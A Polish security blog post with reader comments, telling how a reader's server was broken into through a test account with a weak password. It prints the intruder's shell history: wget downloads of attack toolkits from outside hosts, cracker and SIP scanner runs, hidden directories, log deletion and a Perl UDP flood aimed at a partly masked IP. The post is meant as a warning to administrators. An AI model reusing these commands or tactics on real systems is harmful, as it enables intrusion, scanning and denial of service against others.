02 listopada 2010
Historia pewnego włamania, oczywiście z morałem
wtorek, listopada 02, 2010 | Autor:
\m/ojtek

Pewien czytelnik podesłał mi bardzo interesujący log dokumentujący skuteczne włamanie na jeden z jego własnych serwerów. Zobaczmy więc, jak doszło do całego zdarzenia oraz co też włamywacz kombinował już po uzyskaniu dostępu do systemu...
Wszystko zaczęło się od tego, że nieroztropny administrator założył sobie konto testowe o nazwie test, zabezpieczone hasłem... z resztą sami zgadnijcie jakim. Za pomocą tych prostych poświadczeń, do systemu na prawach zwykłego użytkownika dostał się włamywacz i natychmiast zaczął się bawić w najlepsze. Wszystko wyglądało dokładnie tak:
ls
echo pwd
echo $PWD
mkdir www
cd www/
vim index.html
w
uname -a
hostname -f
passwd
cat /proc/cpuinfo
cd /dev/shm
ls -a
cD ""
mkdir " "
cd " "
ls -a
cd /home/test
mkdir " "
cd " "
wget www.cipyback.home.ro/xxx.tar
tar xvf nou.tar
rm -rf nou.tar
cd probe/
./crack xxx.65
w
cd ..
rm -rf probe/
cd ..
rm -rf test/
w
cd /home
ls -a
last -20
cat /proc/cpuinfo
uname -a
w
cd /home
ls -a
cd ..
ls -a
rm -rf sipscan7.1/
w
ps ax
kill -9 17604
w
cd /home
ls -a
last -20
hostname -f
w
ls -a
w
cd /dev/shm
ls -a
mkdir " "
cd " "
cd /home/test
wget teamhacking.netfirms.com/xxx.tgz
tar zxvf sip.tgz
rm -rf sip.tgz
cd sipscan7.1/
nano email
screen
w
cd /dev/shm
cd
cD " "
cd /dev/shm
cd " "
mkdir " "
cd " "
cd /home/test
ls -a
cd " "
ls -a
wget www.cipyback.home.ro/xxx.tar
tar xvf nou.tar
rm -rf nou.tar
cd probe/
./crack xx.16
cd " "
ls -a
cd ..
ls -a
rm -rf .access.log/
cd " "
ls -a
cd probe/
ls -a
cat vuln.txt
./crack xx.52
cd /home/test
wget corleone.athost.biz/xxx.tgz
tar zxvf sip.tgz
rm -rf sip.tgz
cd aloha/
ls -a
nano mail_to.test
nano mail_to.txt
screen
./svmap.py xxx.0.0.0-xxx.255.255.255
Po uzyskaniu uprawnień administracyjnych, zabawa trwała w najlepsze:
sudo -s
uname -a
exit
exit
w
ps -x
cd /var/tmp
ls -a
cd " "
ls -a
cd ..
wget pibo.com/.x/flood/xxx.tar
tar zxvf udp.tar
rm -rf udp.tar
chmod +x *
perl udp.pl xxx.102.52.202 0 0
Ciekaw jestem, jak oceniacie umiejętności oraz narzędzia wykorzystane przez tego włamywacza? Jedno jest natomiast pewne. Tworzenie testowych kont zabezpieczonych bardzo słabymi hasłami nigdy nie jest dobrym pomysłem i jest to jedna z najczęstszych furtek otwierających włamywaczom drogę do wielu serwerów oraz usług pracujących w Internecie.
Komentarze (20)

Sortuj po: Data Ocena Ostatnia Aktywność
Wczytywanie komentarzy...
Wyślij nowy komentarz
Comments by IntenseDebate
Odpowiedz jako Gość, lub zaloguj się:
WróćPołączony jako (Wyloguj się)
Nie wyświetla się publicznie.
Publikowanie anonimowe.
Historia pewnego włamania, oczywiście z morałem
2010-11-02T21:37:00+01:00
\m/ojtek
Bezpieczeństwo systemów operacyjnych|Informatyka śledcza|Obrona - Atak|Wywiad informatyczny|
Subskrybuj:
Komentarze do posta (Atom)
Wyszukaj w HCSL:
Subskrybuj:
Najpopularniejsze artykuły wszech czasów:
- Urządzenia do kopiowania kart płatniczych
- Co tak naprawdę ujawniasz w Internecie?
- Dlaczego należy zasłaniać klawiaturę bankomatu?
- Publiczna wiadomość z ukrytym przekazem
- Przyszłość antywirusów jest jasna
- Sposób na obejście internetowych blokad
- Superbezpieczne hasła na... żółtej karteczce
- Funkcje sprzętowego kasowania danych w HDD!
- 12-latek odkrył krytyczną lukę w Firefoksie
- Przestępstwo nie popłaca
- Czy jesteśmy inwigilowani przez chiński sprzęt?
- Gotowy zestaw do podsłuchiwania GSM
- Jak działa internetowa mafia?
- Uwaga na nowy rodzaj ataków phishingowych!
- Microsoftowy poradnik dla organów ścigania!
- Polski super-bezpieczny system Qubes OS
- Dane wieczyście dostępne
- Pierwszy atak samochodowych crackerów
- Pliki PDF zdolne do wykonania dowolnego kodu
- Polskie służby współpracują z firmą Google?
- Więzienie za odmowę ujawnienia hasła
- Podrzucanie dziecięcej pornografii
- Zapomniany film o hakerach
- Łamanie haseł w Windows Vista i 7
abcdefg · 752 tygodni temu
wget www.cipyback.home.ro/xxx.tar
tar xvf nou.tar
#fail
\m/ojtek 84p · 752 tygodni temu
gfedcba · 752 tygodni temu
wget corleone.athost.biz/xxx.tgz
tar zxvf sip.tgz
\m/ojtek 84p · 752 tygodni temu
ppw 67p · 752 tygodni temu
jak?
\m/ojtek 84p · 752 tygodni temu
ppw 67p · 752 tygodni temu
\m/ojtek 84p · 752 tygodni temu
foxpl · 752 tygodni temu
ej, skad masz moje bash_history ??!!
Krzysiek · 751 tygodni temu
\m/ojtek 84p · 751 tygodni temu
rickkkkm · 751 tygodni temu
\m/ojtek 84p · 751 tygodni temu
foxpl · 751 tygodni temu
anonymous · 751 tygodni temu
anonymous · 751 tygodni temu
amator · 751 tygodni temu
Ja początkujący :)
anonymous · 751 tygodni temu
Umiejętności - co tu oceniać, rumuński script kiddie, widać tylko, że potrafi odpalić svmap i skaner ssh. A, i utworzyć katalog " ". Nie ma o czym gadać.
Narzędzia - zależy które. Niektóre skrypty fajnie napisane, niektóre beznadziejnie. Paczki, które koleś ściągał, na kolana nie powalają - śmieci w środku, dynamicznie zlinkowane binarki... taka tam zbieranina narzędzi. Wpisywanie swojego nicka do źródeł pscana jest żałosne.
No dobra, na kolana powalił mnie flooder udp - napisany na poziomie przedszkolaka, bez elementarnej znajomości perla.
Na marginesie - logi są niechronologiczne (robota screena), prawdopodobnie niekompletne, a na pewno przerobione (i nie mam na myśli powstawianych "xxx"). Początkowe polecenia wyglądają na robotę "admina" tego... hmm... debiana 4.0?
xcvbxcvbcxvbxcvb · 751 tygodni temu
dariusz · 751 tygodni temu
Eksperci uznali atak za typowy incydent, któremu nie warto poświęcać uwagi.
Wiem, wiem mało prawdopodobne, ale kto wie... ;)